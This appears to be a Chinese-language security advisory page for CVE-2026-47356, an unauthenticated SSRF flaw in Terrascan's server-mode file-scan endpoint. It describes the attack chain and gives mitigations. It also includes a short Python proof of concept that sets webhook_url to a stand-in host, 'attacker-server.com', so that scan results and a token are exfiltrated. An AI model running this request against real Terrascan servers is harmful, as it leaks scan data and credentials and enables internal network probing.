CVE-2026-47356 CVSS 7.5 高危

CVE-2026-47356 Terrascan SSRF漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-47356

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Terrascan

漏洞概述

Terrascan v1.18.3及更早版本在服务器模式下存在服务器端请求伪造（SSRF）漏洞。由于该模式默认绑定到0.0.0.0且未配置身份认证，未经身份认证的远程攻击者可利用文件扫描接口中的webhook_url参数注入任意URL。服务器在完成文件扫描后，会将包含完整扫描结果的敏感数据通过HTTP POST请求发送至攻击者指定的URL，导致信息泄露。目前该项目已归档，官方确认不会发布修复补丁。

技术细节

该漏洞存在于Terrascan运行的服务器模式（terrascan server）中。漏洞触发点位于`POST /v1/{iac}/{iacVersion}/{cloud}/local/file/scan`接口。攻击者无需认证即可发送请求，并在multipart/form-data表单中指定`webhook_url`参数为一个受控的恶意地址。服务端在逻辑上未对该参数进行合法性校验或白名单限制，直接将其作为回调地址。当扫描任务结束后，Terrascan会利用内置的重试HTTP客户端（失败时最多重试10次）向该地址发起POST请求。请求体中包含完整的扫描结果JSON数据，且请求头`Authorization`中包含了攻击者传入的Token。这种行为不仅直接导致了扫描结果的敏感信息泄露，由于HTTP客户端的重试机制，还可以被利用来探测内网服务的存活性（SSRF利用），对内网安全构成威胁。

攻击链分析

STEP 1

侦察

攻击者发现目标网络中运行在9010端口（默认）的Terrascan服务器实例，且该服务无需认证即可访问。

STEP 2

利用

攻击者构造恶意的HTTP POST请求发送至文件扫描接口，在请求体中包含一个待扫描的文件，并将`webhook_url`参数设置为攻击者控制的服务器地址。

STEP 3

触发与回连

Terrascan服务器接收请求并执行文件扫描。扫描完成后，服务器解析`webhook_url`参数，并向该地址发起HTTP POST请求，附带扫描结果JSON和Token。

STEP 4

数据泄露

攻击者控制的服务器接收到请求，从而获取到Terrascan的扫描结果数据及内部Token信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Terrascan server)
target_url = "http://localhost:9010/v1/tf/v1/aws/local/file/scan"

# Attacker controlled URL
attacker_url = "http://attacker-server.com/capture"

# Sample file content to scan
files = {'file': ('main.tf', b'terraform code example')}

# Vulnerable parameter
data = {
    'webhook_url': attacker_url,
    'webhook_token': 'stolen-secret-token'
}

try:
    # Send exploit request
    response = requests.post(target_url, files=files, data=data)
    print(f"Request sent, status code: {response.status_code}")
    print("Check attacker server for the data exfiltration via POST request.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Terrascan <= 1.18.3

防御指南

临时缓解措施

由于官方已停止维护且明确表示不会发布补丁，建议采取以下临时缓解措施：1. 立即停止在公网暴露Terrascan服务，将其部署在内网环境中；2. 通过网络防火墙或安全组策略，严格限制仅允许受信任的IP地址访问Terrascan服务端口；3. 若必须继续使用，应在Terrascan服务前端部署具备认证功能的反向代理（如Nginx配合Basic Auth或OAuth），以拦截未授权的扫描请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-47356
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-47356
3 Details https://www.cvedetails.com/cve/CVE-2026-47356/
4 VulDB https://vuldb.com/cve/CVE-2026-47356
5 Link https://github.com/tenable/terrascan

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表